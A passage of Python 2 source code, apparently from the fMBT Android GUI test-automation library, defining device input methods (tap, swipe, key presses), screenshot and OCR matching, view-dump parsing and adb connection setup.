floating point coordinates in range [0.0, 1.0] are
scaled to full screen width and height, others are
handled as absolute coordinate values.
delayBeforeMoves (float, optional):
seconds to wait after touching and before dragging.
delayBetweenMoves (float, optional):
seconds to wait when moving between points when
dragging.
delayAfterMoves (float, optional):
seconds to wait after dragging, before raising
fingertip.
movePoints (integer, optional):
the number of intermediate move points between end
points of the line.
Returns True on success, False if sending input failed.
"""
x1, y1 = self.intCoords((x1, y1))
x2, y2 = self.intCoords((x2, y2))
if not self._conn.sendTouchDown(x1, y1): return False
time.sleep(delayBeforeMoves)
for i in xrange(0, movePoints):
nx = x1 + int(round(((x2 - x1) / float(movePoints+1)) * (i+1)))
ny = y1 + int(round(((y2 - y1) / float(movePoints+1)) * (i+1)))
if not self._conn.sendTouchMove(nx, ny): return False
if i < movePoints - 1: time.sleep(delayBetweenMoves)
time.sleep(delayAfterMoves)
if self._conn.sendTouchUp(x2, y2): return True
return False
def intCoords(self, (x, y)):
"""
Convert floating point coordinate values in range [0.0, 1.0] to
screen coordinates.
"""
width, height = self.screenSize()
if 0 <= x <= 1 and type(x) == float: x = x * width
if 0 <= y <= 1 and type(y) == float: y = y * height
return (int(round(x)), int(round(y)))
def loadConfig(self, filenameOrObj, override=True, level=""):
try:
if type(filenameOrObj) == str:
filename = filenameOrObj
fileObj = file(filenameOrObj)
else:
fileObj = filenameOrObj
filename = getattr(fileObj, "name", "<string>")
if hasattr(fileObj, "seek"):
fileObj.seek(0)
self._conf.addFile(fileObj, override=override)
except Exception, e:
_adapterLog('Loading %s configuration from "%s" failed: %s' % (level, filename, e))
return
_adapterLog('Loaded %s configuration from "%s"' % (level, filename))
def platformVersion(self):
"""
Returns the platform version of the device.
"""
if self._platformVersion == None:
if self._conn:
self._platformVersion = self._conn.recvVariable("build.version.release")
else:
self._platformVersion = "nosoftware"
return self._platformVersion
def pressBack(self, **pressKeyKwArgs):
"""
Press the back button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_BACK", **pressKeyKwArgs)
def pressHome(self, **pressKeyKwArgs):
"""
Press the home button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_HOME", **pressKeyKwArgs)
def pressKey(self, keyName, long=False, hold=0.0):
"""
Press a key on the device.
Parameters:
keyName (string):
the name of the key, like KEYCODE_HOME. If KEYCODE_
prefix is not given, it is added. Refer to Android
KeyEvent documentation.
long (boolean, optional):
if True, press the key for long time.
hold (float, optional):
time in seconds to hold the key down.
"""
if not keyName.upper().startswith("KEYCODE_"):
keyName = "KEYCODE_" + keyName
keyName = keyName.upper()
if long and hold == None:
hold = self._longPressHoldTime
if hold > 0.0:
try:
assert self._conn.sendKeyDown(keyName)
time.sleep(hold)
assert self._conn.sendKeyUp(keyName)
except:
return False
return True
return self._conn.sendPress(keyName)
def pressMenu(self, **pressKeyKwArgs):
"""
Press the menu button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_MENU", **pressKeyKwArgs)
def pressPower(self, **pressKeyKwArgs):
"""
Press the power button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_POWER", **pressKeyKwArgs)
def pressVolumeUp(self, **pressKeyKwArgs):
"""
Press the volume up button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_VOLUME_UP", **pressKeyKwArgs)
def pressVolumeDown(self, **pressKeyKwArgs):
"""
Press the volume down button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_VOLUME_DOWN", **pressKeyKwArgs)
def reboot(self, reconnect=True, firstBoot=False):
"""
Reboot the device.
Parameters
reconnect (boolean, optional)
If True, do not return until the device has been
connected after boot. Otherwise return once reboot
command has been sent. The default is True.
firstBoot (boolean, optional)
If True, the device boots like it would have been
flashed. Requires that "adb root" works. The default
is False.
Returns True on success, otherwise False.
"""
return self._conn.reboot(reconnect, firstBoot, 120)
def reconnect(self):
"""
Close connections to the device and reconnect.
"""
del self._conn
try:
self._conn = _AndroidDeviceConnection(self.serialNumber)
return True
except Exception, e:
_adapterLog("reconnect failed: %s" % (e,))
return False
def refreshScreenshot(self, forcedScreenshot=None):
"""
Takes new screenshot from the device and updates latest
screenshot object.
Parameters:
forcedScreenshot (Screenshot or string, optional):
use given screenshot or image file, do not take new
screenshot.
Returns created Screenshot object.
"""
if forcedScreenshot != None:
if type(forcedScreenshot) == str:
self._lastScreenshot = Screenshot(
screenshotFile=forcedScreenshot,
pathSolver=_bitmapPathSolver(self._fmbtAndroidHomeDir, self.bitmapPath),
screenSize=self.screenSize())
else:
self._lastScreenshot = forcedScreenshot
else:
screenshotFile = self._conn.screenshot(screenshotDir=self.screenshotDir)
self._lastScreenshot = Screenshot(
screenshotFile=screenshotFile,
pathSolver=_bitmapPathSolver(self._fmbtAndroidHomeDir, self.bitmapPath),
screenSize=self.screenSize())
return self._lastScreenshot
def refreshView(self, forcedView=None):
"""
(Re)reads view items on display and updates the latest View
object.
Parameters:
forcedView (View or filename, optional):
use given View object or view file instead of reading
items from the device.
Returns created View object.
"""
def formatErrors(errors):
return "refreshView parse errors:\n %s" % (
"\n ".join(["line %s: %s error: %s" % e for e in errors]),)
if forcedView != None:
if isinstance(forcedView, View):
self._lastView = forcedView
elif type(forcedView) == str:
self._lastView = View(self.screenshotDir, self.serialNumber, file(forcedView).read())
_adapterLog(formatErrors(self._lastView.errors()))
else:
raise ValueError("forcedView must be a View object or a filename")
return self._lastView
retryCount = 0
while True:
dump = self._conn.recvViewData()
if dump == None: # dump unreadable
return None
view = View(self.screenshotDir, self.serialNumber, dump)
if len(view.errors()) > 0 and retryCount < self._PARSE_VIEW_RETRY_LIMIT:
_adapterLog(formatErrors(view.errors()))
retryCount += 1
time.sleep(0.2) # sleep before retry
else:
# successfully parsed or parsed with errors but no more retries
self._lastView = view
return view
def screenshot(self):
"""
Returns the latest Screenshot object.
Use refreshScreenshot() to get a new screenshot.
"""
return self._lastScreenshot
def screenSize(self):
"""
Returns screen size in pixels in tuple (width, height).
"""
if self._screenSize == None:
self._screenSize = self._conn.recvScreenSize()
return self._screenSize
def shell(self, shellCommand):
"""
Execute shellCommand in adb shell.
shellCommand is a string (arguments separated by whitespace).
Returns output of "adb shell" command.
If you wish to receive exitstatus or standard output and error
separated from shellCommand, refer to shellSOE().
"""
return self._conn._runAdb(["shell", shellCommand])[1]
def shellSOE(self, shellCommand):
"""
Execute shellCommand in adb shell.
shellCommand is a string (arguments separated by whitespace).
Returns tuple (exitStatus, standardOutput, standardError).
Requires tar and uuencode to be available on the device.
"""
return self._conn.shellSOE(shellCommand)
def smsNumber(self, number, message):
"""
Send message using SMS to given number.
Parameters:
number (string)
phone number to which the SMS will be sent
message (string)
the message to be sent.
Returns True on success, otherwise False.
"""
smsCommand = ('am start -a android.intent.action.SENDTO ' +
'-d sms:%s --es sms_body "%s"' +
' --ez exit_on_sent true') % (number, message)
status, out, err = self.shellSOE(smsCommand)
if status != 0:
_logFailedCommand("sms", smsCommand, status, out, err)
return False
_adapterLog("SMS command returned %s" % (out + err,))
time.sleep(2)
self.pressKey("KEYCODE_DPAD_RIGHT")
time.sleep(1)
self.pressKey("KEYCODE_ENTER")
return True
def supportsView(self):
"""
Check if connected device supports reading view data.
View data is needed by refreshView(), view(), verifyText() and
waitText(). It is produced by Android window dump.
Returns True if view data can be read, otherwise False.
"""
try:
self._conn.recvViewData()
return True
except AndroidConnectionError:
return False
def swipe(self, (x, y), direction, **dragKwArgs):
"""
swipe starting from coordinates (x, y) to direction ("n", "s",
"e" or "w"). Swipe ends to the edge of the screen.
Coordinates and keyword arguments are the same as for the drag
function.
Returns True on success, False if sending input failed.
"""
d = direction.lower()
if d in ["n", "north"]: x2, y2 = self.intCoords((x, 0.0))
elif d in ["s", "south"]: x2, y2 = self.intCoords((x, 1.0))
elif d in ["e", "east"]: x2, y2 = self.intCoords((1.0, y))
elif d in ["w", "west"]: x2, y2 = self.intCoords((0.0, y))
else:
msg = 'Illegal direction "%s"' % (direction,)
_adapterLog(msg)
raise Exception(msg)
return self.drag((x, y), (x2, y2), **dragKwArgs)
def swipeBitmap(self, bitmap, direction, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0), **dragKwArgs):
"""
swipe starting from bitmap to direction ("n", "s", "e", or
"w"). Swipe ends to the edge of the screen.
Parameters:
colorMatch, area
refer to verifyBitmap documentation.
delayBeforeMoves, delayBetweenMoves, delayAfterMoves,
movePoints
refer to drag documentation.
Returns True on success, False if sending input failed.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByBitmap(bitmap, colorMatch=colorMatch, area=area)
if len(items) == 0:
_adapterLog("swipeBitmap: bitmap %s not found from %s" % (bitmap, self._lastScreenshot.filename()))
return False
return self.swipeItem(items[0], direction, **dragKwArgs)
def swipeItem(self, viewItem, direction, **dragKwArgs):
"""
swipe starting from viewItem to direction ("n", "s", "e" or
"w"). Swipe ends to the edge of the screen.
Keyword arguments are the same as for the drag function.
Returns True on success, False if sending input failed.
"""
return self.swipe(viewItem.coords(), direction, **dragKwArgs)
def systemProperty(self, propertyName):
"""
Returns Android Monkey Device properties, such as
"clock.uptime", refer to Android Monkey documentation.
"""
return self._conn.recvVariable(propertyName)
def tap(self, (x, y), long=False, hold=0.0):
"""
Tap screen on coordinates (x, y).
Parameters:
coordinates (floats in range [0.0, 1.0] or integers):
floating point coordinates in range [0.0, 1.0] are
scaled to full screen width and height, others are
handled as absolute coordinate values.
long (boolean, optional):
if True, touch the screen for a long time.
hold (float, optional):
time in seconds to touch the screen.
Returns True if successful, otherwise False.
"""
x, y = self.intCoords((x, y))
if long and hold == None:
hold = self._longTapHoldTime
if hold > 0.0:
try:
assert self._conn.sendTouchDown(x, y)
time.sleep(hold)
assert self._conn.sendTouchUp(x, y)
except:
return False
return True
else:
return self._conn.sendTap(x, y)
def tapBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0), **tapKwArgs):
"""
Find a bitmap from the latest screenshot, and tap it.
Parameters:
bitmap (string):
filename of the bitmap to be tapped.
colorMatch, area (optional):
refer to verifyBitmap documentation.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByBitmap(bitmap, colorMatch=colorMatch, area=area)
if len(items) == 0:
_adapterLog("tapBitmap: bitmap %s not found from %s" % (bitmap, self._lastScreenshot.filename()))
return False
return self.tapItem(items[0], **tapKwArgs)
def tapId(self, viewItemId, **tapKwArgs):
"""
Find an item with given id from the latest view, and tap it.
"""
assert self._lastView != None, "View required."
items = self._lastView.findItemsById(viewItemId, count=1)
if len(items) > 0:
return self.tapItem(items[0], **tapKwArgs)
else:
_adapterLog("tapItemById(%s): no items found" % (viewItemId,))
return False
def tapItem(self, viewItem, **tapKwArgs):
"""
Tap the center point of viewItem.
"""
return self.tap(viewItem.coords(), **tapKwArgs)
def tapOcrText(self, word, match=1.0, preprocess=None, **tapKwArgs):
"""
Find the given word from the latest screenshot using OCR, and
tap it.
Parameters:
word (string):
the word to be tapped.
match (float, optional):
minimum match score in range [0.0, 1.0].
The default is 1.0 (exact match).
preprocess (string, optional):
preprocess filter to be used in OCR for better
result. Refer to eyenfinger.autoconfigure to search
for a good one.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByOcr(word, match=match, preprocess=preprocess)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def tapText(self, text, partial=False, **tapKwArgs):
"""
Find an item with given text from the latest view, and tap it.
Parameters:
partial (boolean, optional):
refer to verifyText documentation. The default is
False.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastView != None, "View required."
items = self._lastView.findItemsByText(text, partial=partial, count=1)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def topApp(self):
"""
Returns the name of the top application.
"""
return self._conn.recvTopAppWindow()[0]
def topWindow(self):
"""
Returns the name of the top window.
"""
return self._conn.recvTopAppWindow()[1]
def type(self, text):
return self._conn.sendType(text)
def verifyOcrText(self, word, match=1.0, preprocess=None):
"""
Verify using OCR that the last screenshot contains the given word.
Parameters:
word (string):
the word to be searched for.
match (float, optional):
minimum match score in range [0.0, 1.0].
The default is 1.0 (exact match).
preprocess (string, optional):
preprocess filter to be used in OCR for better
result. Refer to eyenfinger.autoconfigure to search
for a good one.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastScreenshot != None, "Screenshot required."
return self._lastScreenshot.findItemsByOcr(word, match=match, preprocess=preprocess) != []
def verifyText(self, text, partial=False):
"""
Verify that the last view has at least one item with given
text.
Parameters:
text (string):
text to be searched for in items.
partial (boolean, optional):
if True, match items if item text contains given
text, otherwise match only if item text is equal to
the given text. The default is False (exact match).
"""
assert self._lastView != None, "View required."
return self._lastView.findItemsByText(text, partial=partial, count=1) != []
def verifyBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0)):
"""
Verify that bitmap is present in the last screenshot.
Parameters:
bitmap (string):
filename of the bitmap file to be searched for.
colorMatch (float, optional):
required color matching accuracy. The default is 1.0
(exact match). For instance, 0.75 requires that
every pixel's every RGB component value on the
bitmap is at least 75 % match with the value of
corresponding pixel's RGB component in the
screenshot.
area ((left, top, right, bottom), optional):
search bitmap from the given area only. Left, top
right and bottom are either absolute coordinates
(integers) or floats in range [0.0, 1.0]. In the
latter case they are scaled to screenshot
dimensions. The default is (0.0, 0.0, 1.0, 1.0),
that is, search everywhere in the screenshot.
"""
assert self._lastScreenshot != None, "Screenshot required."
if self._lastScreenshot == None:
return False
return self._lastScreenshot.findItemsByBitmap(bitmap, colorMatch=colorMatch, area=area) != []
def view(self):
"""
Returns the last view (the most recently refreshed view).
"""
return self._lastView
def wait(self, refreshFunc, waitFunc, waitFuncArgs, waitFuncKwargs={}, waitTime = 5.0, pollDelay = 1.0):
"""
Wait until waitFunc returns True or waitTime has expired.
Parameters:
refreshFunc (function):
this function is called before re-evaluating
waitFunc. For instance, refreshView or
refreshScreenshot.
waitFunc, waitFuncArgs, waitFuncKwargs (function, tuple,
dictionary):
wait for waitFunc(waitFuncArgs, waitFuncKwargs) to
return True
waitTime (float, optional):
max. time in seconds to wait for.
pollDelay (float, optional):
time in seconds to sleep between refreshs.
Returns True if waitFunc returns True - either immediately or
before waitTime has expired - otherwise False.
"""
if waitFunc(*waitFuncArgs, **waitFuncKwargs):
return True
startTime = time.time()
endTime = startTime + waitTime
now = startTime
while now < endTime:
time.sleep(min(pollDelay, (endTime - now)))
now = time.time()
refreshFunc()
if waitFunc(*waitFuncArgs, **waitFuncKwargs):
return True
return False
def waitBitmap(self, bitmap, colorMatch=None, area=None, **waitKwArgs):
"""
Wait until bitmap appears on screen.
Parameters:
bitmap (string):
filename of the bitmap to be waited for.
colorMatch, area (optional):
refer to verifyBitmap documentation.
waitTime, pollDelay (float, optional):
refer to wait documentation.
Returns True if bitmap appeared within given time limit,
otherwise False.
Updates the last screenshot.
"""
verifyBitmapKwArgs = {}
if colorMatch != None: verifyBitmapKwArgs['colorMatch'] = colorMatch
if area != None: verifyBitmapKwArgs['area'] = area
return self.wait(self.refreshScreenshot,
self.verifyBitmap, (bitmap,), verifyBitmapKwArgs,
**waitKwArgs)
def waitText(self, text, partial=False, **waitKwArgs):
"""
Wait until text appears in any view item.
Parameters:
text (string):
text to be waited for.
partial (boolean, optional):
refer to verifyText. The default is False.
waitTime, pollDelay (float, optional):
refer to wait.
Returns True if text appeared within given time limit,
otherwise False.
Updates the last view.
"""
return self.wait(self.refreshView,
self.verifyText, (text,), {'partial': partial},
**waitKwArgs)
def _bitmapFilename(self, bitmap, checkReadable=True):
if bitmap.startswith("/") or os.access(bitmap, os.R_OK):
path = [os.path.dirname(bitmap)]
bitmap = os.path.basename(bitmap)
else:
path = []
for singleDir in self.bitmapPath.split(":"):
if not singleDir.startswith("/"):
path.append(os.path.join(self._fmbtAndroidHomeDir, singleDir))
else:
path.append(singleDir)
for singleDir in path:
retval = os.path.join(singleDir, bitmap)
if not checkReadable or os.access(retval, os.R_OK):
break
if checkReadable and not os.access(retval, os.R_OK):
raise ValueError('Bitmap "%s" not readable in bitmapPath %s' % (bitmap, ':'.join(path)))
return retval
def _loadDeviceAndTestINIs(self, homeDir, deviceName, iniFile):
if deviceName != None:
_deviceIniFilename = homeDir + os.sep + "etc" + os.sep + deviceName + ".ini"
self.loadConfig(_deviceIniFilename, override=True, level="device")
if iniFile:
self.loadConfig(iniFile, override=True, level="test")
class _DeviceConf:
"""
Miniparser for INI files like:
[section1]
key1 = value1
; commented = out
# commented = out
"""
def __init__(self, fileObj=None):
# _conf is a dictionary:
# (section, key) -> value
self._conf = {}
if fileObj:
self.addFile(fileObj)
def addFile(self, fileObj, override=True):
for line in fileObj:
line = line.strip()
if line.startswith('[') and line.endswith(']'):
section = line[1:-1].strip()
elif line.startswith(";") or line.startswith("#"):
continue
elif '=' in line:
key, value = line.split('=')
if override or (section, key.strip()) not in self._conf:
self._conf[(section, key.strip())] = value.strip()
def sections(self):
return list(set([k[0] for k in self._conf.keys()]))
def keys(self, section):
return [k[1] for k in self._conf.keys() if k[0] == section]
def dump(self):
lines = []
for section in sorted(self.sections()):
lines.append("[%s]" % (section,))
for key in sorted(self.keys(section)):
lines.append("%-16s = %s" % (key, self._conf[(section, key)]))
lines.append("")
return "\n".join(lines)
def set(self, section, key, value):
self._conf[(section, key)] = value
def value(self, section, key, default=""):
"""
Returns the value associated with the key in the section.
The default is returned if the key is not found.
dump() will dump also sections and keys with
default values that have been returned.
"""
if not (section, key) in self._conf:
self._conf[(section, key)] = default
return self._conf[(section, key)]
class Screenshot(object):
"""
Screenshot class takes and holds a screenshot (bitmap) of device
display, or a forced bitmap file if device connection is not given.
"""
def __init__(self, screenshotFile=None, pathSolver=None, screenSize=None):
self._filename = screenshotFile
self._pathSolver = pathSolver
self._screenSize = screenSize
# The bitmap held inside screenshot object is never updated.
# If new screenshot is taken, this screenshot object disappears.
# => cache all search hits
self._cache = {}
self._ocrWords = None
self._ocrPreprocess = _OCRPREPROCESS
def dumpOcrWords(self, preprocess=None):
self._assumeOcrWords(preprocess=preprocess)
w = []
for ppfilter in self._ocrWords:
for word in self._ocrWords[ppfilter]:
for appearance, (wid, middle, bbox) in enumerate(self._ocrWords[ppfilter][word]):
(x1, y1, x2, y2) = bbox
w.append((word, x1, y1))
return sorted(set(w), key=lambda i:(i[2]/8, i[1]))
def filename(self):
return self._filename
def findItemsByBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0)):
bitmap = self._pathSolver(bitmap)
if (bitmap, colorMatch) in self._cache:
return self._cache[(bitmap, colorMatch)]
eyenfinger.iRead(source=self._filename, ocr=False)
try:
score, bbox = eyenfinger.iVerifyIcon(bitmap, colorMatch=colorMatch, opacityLimit=.95, area=area)
foundItem = self._item("bitmap", bbox, bitmap=bitmap)
self._cache[(bitmap, colorMatch)] = [foundItem]
except eyenfinger.BadMatch:
_adapterLog('findItemsByBitmap no match for "%s" in "%s"' % (bitmap, self._filename))
self._cache[(bitmap, colorMatch)] = []
return self._cache[(bitmap, colorMatch)]
def findItemsByOcr(self, text, preprocess=None, match=1.0):
self._assumeOcrWords(preprocess=preprocess)
for ppfilter in self._ocrWords.keys():
try:
eyenfinger._g_words = self._ocrWords[ppfilter]
(score, word), bbox = eyenfinger.iVerifyWord(text, match=match)
break
except eyenfinger.BadMatch:
continue
else:
return []
return [self._item("OCR word", bbox, ocrFind=text, ocrFound=word)]
def save(self, fileOrDirName):
shutil.copy(self._filename, fileOrDirName)
def _assumeOcrWords(self, preprocess=None):
if self._ocrWords == None:
if preprocess == None:
preprocess = self._ocrPreprocess
if not type(preprocess) in (list, tuple):
preprocess = [preprocess]
self._ocrWords = {}
for ppfilter in preprocess:
pp = ppfilter % { "zoom": "-resize %sx" % (self._screenSize[0] * 2) }
eyenfinger.iRead(source=self._filename, ocr=True, preprocess=pp)
self._ocrWords[ppfilter] = eyenfinger._g_words
def _item(self, className, (x1, y1, x2, y2), bitmap=None, ocrFind=None, ocrFound=None):
return ViewItem(
className, None, 0,
{"layout:mLeft": x1,
"layout:mTop": y1,
"layout:getHeight()": y2-y1,
"layout:getWidth()": x2-x1,
"screenshot": self._filename,
"bitmap": bitmap,
"ocrFind": ocrFind,
"ocrFound": ocrFound,
},
None, "")
def __str__(self):
return 'Screenshot(filename="%s")' % (self._filename,)
class ViewItem(object):
"""
ViewItem holds the information of a single GUI element.
"""
def __init__(self, className, code, indent, properties, parent, rawProps):
self._className = className
self._code = code
self._indent = indent
self._p = properties
self._parent = parent
self._children = []
self._bbox = []
self._rawProps = ""
if not "scrolling:mScrollX" in self._p:
self._p["scrolling:mScrollX"] = 0
self._p["scrolling:mScrollY"] = 0
def addChild(self,child): self._children.append(child)
def bbox(self):
if self._bbox == []:
left = int(self._p["layout:mLeft"])
top = int(self._p["layout:mTop"])
parent = self._parent
while parent:
pp = parent._p
left += int(pp["layout:mLeft"]) - int(pp["scrolling:mScrollX"])
top += int(pp["layout:mTop"]) - int(pp["scrolling:mScrollY"])
parent = parent._parent
height = int(self._p["layout:getHeight()"])
width = int(self._p["layout:getWidth()"])
self._bbox = (left, top, left + width, top + height)
return self._bbox
def children(self): return self._children
def className(self): return self._className
def code(self): return self._code
def coords(self):
left, top, right, bottom = self.bbox()
return (left + (right-left)/2, top + (bottom-top)/2)
def indent(self): return self._indent
def id(self): return self.property("mID")
def parent(self): return self._parent
def properties(self): return self._p
def property(self, propertyName):
return self._p.get(propertyName, None)
def text(self): return self.property("text:mText")
def visible(self):
return self._p.get("getVisibility()", "") == "VISIBLE"
def dump(self):
p = self._p
return ("ViewItem(\n\tchildren = %d\n\tclassName = '%s'\n\tcode = '%s'\n\t" +
"indent = %d\n\tproperties = {\n\t\t%s\n\t})") % (
len(self._children), self._className, self._code, self._indent,
'\n\t\t'.join(['"%s": %s' % (key, p[key]) for key in sorted(p.keys())]))
def __str__(self):
return ("ViewItem(className='%s', id=%s, bbox=%s)" % (
self._className, self.id(), self.bbox()))
class View(object):
"""
View provides interface to screen dumps from Android. It parses
the dump to a hierarchy of ViewItems. find* methods enable searching
for ViewItems based on their properties.
"""
def __init__(self, screenshotDir, serialNumber, dump):
self.screenshotDir = screenshotDir
self.serialNumber = serialNumber
self._viewItems = []
self._errors = []
self._lineRegEx = re.compile("(?P<indent>\s*)(?P<class>[\w.$]+)@(?P<id>[0-9A-Fa-f]{8} )(?P<properties>.*)")
self._olderAndroidLineRegEx = re.compile("(?P<indent>\s*)(?P<class>[\w.$]+)@(?P<id>\w)(?P<properties>.*)")
self._propRegEx = re.compile("(?P<prop>(?P<name>[^=]+)=(?P<len>\d+),)(?P<data>[^\s]* ?)")
self._dump = dump
self._rawDumpFilename = self.screenshotDir + os.sep + _filenameTimestamp() + "-" + self.serialNumber + ".view"
file(self._rawDumpFilename, "w").write(self._dump)
try: self._parseDump(dump)
except Exception, e:
self._errors.append((-1, "", "Parser error"))
def viewItems(self): return self._viewItems
def errors(self): return self._errors
def dumpRaw(self): return self._dump
def dumpItems(self, itemList = None):
if itemList == None: itemList = self._viewItems
l = []
for i in itemList:
l.append(self._dumpItem(i))
return '\n'.join(l)
def dumpTree(self, rootItem = None):
l = []
if rootItem != None:
l.extend(self._dumpSubTree(rootItem, 0))
else:
for i in self._viewItems:
if i._indent == 0:
l.extend(self._dumpSubTree(i, 0))
return '\n'.join(l)
def _dumpSubTree(self, viewItem, indent):
l = []
i = viewItem
l.append(" "*indent + self._dumpItem(viewItem))
for i in viewItem.children():
l.extend(self._dumpSubTree(i, indent + 4))
return l
def _dumpItem(self, viewItem):
i = viewItem
if i.text() != None: t = '"%s"' % (i.text(),)
else: t = None
return "id=%s cls=%s text=%s bbox=%s" % (
i.id(), i.className(), t, i.bbox())
def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None):
foundItems = []
if count == 0: return foundItems
if searchRootItem != None:
# find from searchRootItem and its children
if comparator(searchRootItem):
foundItems.append(i)
for c in searchRootItem.children():
foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c))
else:
if searchItems != None:
# find from listed items only
searchDomain = searchItems
else:
# find from all items
searchDomain = self._viewItems
for i in searchDomain:
if comparator(i):
foundItems.append(i)
if count > 0 and len(foundItems) >= count:
break
return foundItems
def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None):
"""
Searches the GUI hiearhy for a object with a given text
"""
if partial:
c = lambda item: (
item.properties().get("text:mText", "").find(text) != -1 )
else:
c = lambda item: (
item.properties().get("text:mText", None) == text )
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsById(self, id, count=-1, searchRootItem=None, searchItems=None):
c = lambda item: item.properties().get("mID", "") == id
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByClass(self, className, partial=True, count=-1, searchRootItem=None, searchItems=None):
if partial: c = lambda item: item.className().find(className) != -1
else: c = lambda item: item.className() == className
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByIdAndClass(self, id, className, partial=True, count=-1, searchRootItem=None, searchItems=None):
idOk = self.findItemsById(id, count=-1, searchRootItem=searchRootItem)
return self.findItemsByClass(className, partial=partial, count=count, searchItems=idOk)
def findItemsByRawProps(self, s, count=-1, searchRootItem=None, searchItems=None):
c = lambda item: item._rawProps.find(s) != -1
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def save(self, fileOrDirName):
shutil.copy(self._rawDumpFilename, fileOrDirName)
def _parseDump(self, dump):
"""
Process the raw dump data and create a tree of ViewItems
"""
# This code originates from tema-android-adapter-3.2,
# AndroidAdapter/guireader.py.
self._viewItems = []
cellLayout = ""
parent = None
previousItem = None
currentIndent = 0
visible = True
self.TOP_PAGED_VIEW = ""
for lineIndex, line in enumerate(dump.splitlines()):
if line == "DONE.":
break
# separate indent, class and properties for each GUI object
# TODO: branch here according to self._androidVersion
matcher = self._lineRegEx.match(line)
if not matcher:
# FIXME: this hack falls back to old format,
# should branch according to self._androidVersion!
matcher = self._olderAndroidLineRegEx.match(line)
if not matcher:
self._errors.append((lineIndex + 1, line, "Illegal line"))
continue # skip this line
className = matcher.group("class")
# Indent specifies the hierarchy level of the object
indent = len(matcher.group("indent"))
# If the indent is bigger that previous, this object is a
# child for the previous object
if indent > currentIndent:
parent = self._viewItems[-1]
elif indent < currentIndent:
for tmp in range(0, currentIndent - indent):
parent = parent.parent()
currentIndent = indent
propertiesData = matcher.group("properties")
properties = {}
index = 0
x = 0
y = 0
# Process the properties of each GUI object
while index < len(propertiesData):
# Separate name and value for each property [^=]*=
propMatch = self._propRegEx.match(propertiesData[index:-1])
if not propMatch or len(propMatch.group("data")) < int(propMatch.group("len")):
if not propMatch.group("data"):
self._errors.append((lineIndex, propertiesData[index:-1], "Illegal property"))
return None
startFrom = index + propertiesData[index:-1].find(propMatch.group("data"))
currFixedData = propertiesData[startFrom:(startFrom + int(propMatch.group("len")))]
length = int(propMatch.group("len"))
# [^=]+=?, == data
properties[propMatch.group("name")] = currFixedData[0:length].lstrip()
else:
length = int(propMatch.group("len"))
# [^=]+=?, == data
properties[propMatch.group("name")] = propMatch.group("data")[0:length].lstrip()
index += len(propMatch.group("prop")) + length + 1
self._viewItems.append(ViewItem(matcher.group("class"), matcher.group("id"), indent, properties, parent, matcher.group("properties")))
if parent:
parent.addChild(self._viewItems[-1])
return self._viewItems
def __str__(self):
return 'View(items=%s, dump="%s")' % (
len(self._viewItems), self._rawDumpFilename)
class _AndroidDeviceConnection:
"""
Connection to the Android Device being tested.
"""
_m_host = 'localhost'
_m_port = random.randint(20000, 29999)
_w_host = 'localhost'
_w_port = _m_port + 1
def __init__(self, serialNumber, stopOnError=True):
self._serialNumber = serialNumber
self._stopOnError = stopOnError
self._shellSupportsTar = False
try:
self._resetMonkey()
self._resetWindow()
# check supported features
outputLines = self._runAdb("shell tar")[1].splitlines()
if len(outputLines) == 1 and "bin" in outputLines[0]:
self._shellSupportsTar = False
else:
self._shellSupportsTar = True
finally:
# Next _AndroidDeviceConnection instance will use different ports
self._w_port = _AndroidDeviceConnection._w_port
self._m_port = _AndroidDeviceConnection._m_port
_AndroidDeviceConnection._w_port += 100
_AndroidDeviceConnection._m_port += 100
def __del__(self):
try: self._monkeySocket.close()
except: pass
def _cat(self, remoteFilename):
fd, filename = tempfile.mkstemp("fmbtandroid-cat-")
os.close(fd)
self._runAdb("pull '%s' %s" % (remoteFilename, filename), 0)
contents = file(filename).read()
os.remove(filename)
return contents
def _runAdb(self, command, expectedExitStatus=0):
if not self._stopOnError:
expect = None
else:
expect = expectedExitStatus
if type(command) == list:
command = ["adb", "-s", self._serialNumber] + command
else:
command = ("adb -s '%s' " % (self._serialNumber,)) + command
return _run(command, expectedExitStatus = expect)
def _runSetupCmd(self, cmd, expectedExitStatus = 0):
_adapterLog('setting up connections: "%s"' % (cmd,))
exitStatus, _, _ = self._runAdb(cmd, expectedExitStatus)
if exitStatus == 0: return True
else: return True
def _resetWindow(self):
setupCommands = ["shell service call window 1 i32 4939",
"forward tcp:%s tcp:4939" % (self._w_port,)]
for c in setupCommands:
self._runSetupCmd(c)
def _resetMonkey(self, timeout=3, pollDelay=.25):
self._runSetupCmd("shell monkey --port 1080", None)
time.sleep(pollDelay)
endTime = time.time() + timeout
while time.time() < endTime:
self._runSetupCmd("forward tcp:%s tcp:1080" % (self._m_port,), 0)
try:
